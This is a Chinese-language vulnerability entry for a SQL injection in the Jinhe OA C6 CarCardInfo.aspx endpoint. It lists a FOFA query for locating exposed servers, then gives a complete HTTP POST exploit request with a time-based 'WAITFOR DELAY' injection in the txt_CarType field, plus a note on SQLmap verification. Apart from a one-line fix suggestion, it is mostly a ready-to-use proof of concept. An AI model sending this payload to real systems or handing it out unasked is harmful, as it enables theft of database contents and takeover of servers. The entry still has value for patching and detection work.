J1-11金和-OA-SQL
漏洞描述:
金和OA C6 CarCardInfo.aspx接口处存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
影响版本:
- 金和 OA
网络测绘:
fofa语法:
FOFA:app=“金和网络-金和OA”
漏洞复现:
payload:
POST /c6/JHSoft.Web.Vehicle/CarCardInfo.aspx/ HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
_ListPage1LockNumber=1&_ListPage1RecordCount=0&__VIEWSTATE=%2FwEPDwUKMjAyNTc4NzA3NA8WAh4Ic3RyUXVlcnkFCWRlbGZsYWc9MBYCZg9kFgQCAg8PFgIeBFRleHQFBuafpeivomRkAgMPDxYMHglfUGFnZVNpemUCKB4PX1NvcnRBdHRyaWJ1dGVzMtgDAAEAAAD%2F%2F%2F%2F%2FAQAAAAAAAAAMAgAAAFFVc2VyV2ViQ29udHJvbC5EYXRhR3JpZCwgVmVyc2lvbj04LjUuNS4xMDAxLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPW51bGwFAQAAADlVc2VyV2ViQ29udHJvbC5EYXRhR3JpZC5EYXRhR3JpZCtTb3J0QXR0cmlidXRlc0NvbGxlY3Rpb24BAAAAEEF0dHJpYkNvbGxlY3Rpb24EOFVzZXJXZWJDb250cm9sLkRhdGFHcmlkLkRhdGFHcmlkK1NvcnRBdHRyaWJ1dGVDb2xsZWN0aW9uAgAAAAIAAAAJAwAAAAUDAAAAOFVzZXJXZWJDb250cm9sLkRhdGFHcmlkLkRhdGFHcmlkK1NvcnRBdHRyaWJ1dGVDb2xsZWN0aW9uAQAAABNDb2xsZWN0aW9uQmFzZStsaXN0AxxTeXN0ZW0uQ29sbGVjdGlvbnMuQXJyYXlMaXN0AgAAAAkEAAAABAQAAAAcU3lzdGVtLkNvbGxlY3Rpb25zLkFycmF5TGlzdAMAAAAGX2l0ZW1zBV9zaXplCF92ZXJzaW9uBQAACAgJBQAAAAAAAAAAAAAAEAUAAAAAAAAACx4MX1JlY29yZENvdW50Zh4HX2J1dHRvbjLsBAABAAAA%2F%2F%2F%2F%2FwEAAAAAAAAADAIAAABRVXNlcldlYkNvbnRyb2wuRGF0YUdyaWQsIFZlcnNpb249OC41LjUuMTAwMSwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1udWxsBQEAAAAyVXNlcldlYkNvbnRyb2wuRGF0YUdyaWQuRGF0YUdyaWQrQnV0dG9uc0NvbGxlY3Rpb24BAAAAB2J1dHRvbnMEL1VzZXJXZWJDb250cm9sLkRhdGFHcmlkLkRhdGFHcmlkK0l0ZW1Db2xsZWN0aW9uAgAAAAIAAAAJAwAAAAUDAAAAL1VzZXJXZWJDb250cm9sLkRhdGFHcmlkLkRhdGFHcmlkK0l0ZW1Db2xsZWN0aW9uAQAAABNDb2xsZWN0aW9uQmFzZStsaXN0AxxTeXN0ZW0uQ29sbGVjdGlvbnMuQXJyYXlMaXN0AgAAAAkEAAAABAQAAAAcU3lzdGVtLkNvbGxlY3Rpb25zLkFycmF5TGlzdAMAAAAGX2l0ZW1zBV9zaXplCF92ZXJzaW9uBQAACAgJBQAAAAEAAAABAAAAEAUAAAAEAAAACQYAAAANAwUGAAAAJVVzZXJXZWJDb250cm9sLkRhdGFHcmlkLkRhdGFHcmlkK0l0ZW0EAAAABF9JbWcGX1RpdGxlCF9EaXNwbGF5EV9Eb3NjcmlwdGlvblRpdGxlAQEAAQECAAAABgcAAAA3Li4vSkhzb2Z0LlVJLkxpYi9pbWFnZXMvaWNvbi50b29sYmFyLzE2cHgvZGV0ZXJtaW5lLnBuZwYIAAAABuehruWumgEGCQAAAAALHglfSWRlbnRpZnkCAR4LX2RhdGFTb3VyY2UFaTxyb290PjxyZWNvcmQ%2BPElEPjwvSUQ%2BPGl0ZW0gQ29sdW1uTmFtZT0n6L2m5Z6LJz48L2l0ZW0%2BPGl0ZW0gQ29sdW1uTmFtZT0n54mM54WnJz48L2l0ZW0%2BPC9yZWNvcmQ%2BPC9yb290PmRkZJju89%2Fcb0ViP%2BHqYZwpEbj%2BGmY0EecUW2zJyvdwmUng&txt_CarType=1');WAITFOR DELAY '0:0:5'--&txt_CarCode=1&bt_Search=%B2%E9%D1%AF&__VIEWSTATEGENERATOR=0A1FC31B&__EVENTTARGET=&__EVENTARGUMENT=
效果图:
SQLmap验证
修复建议:
更新到最新系统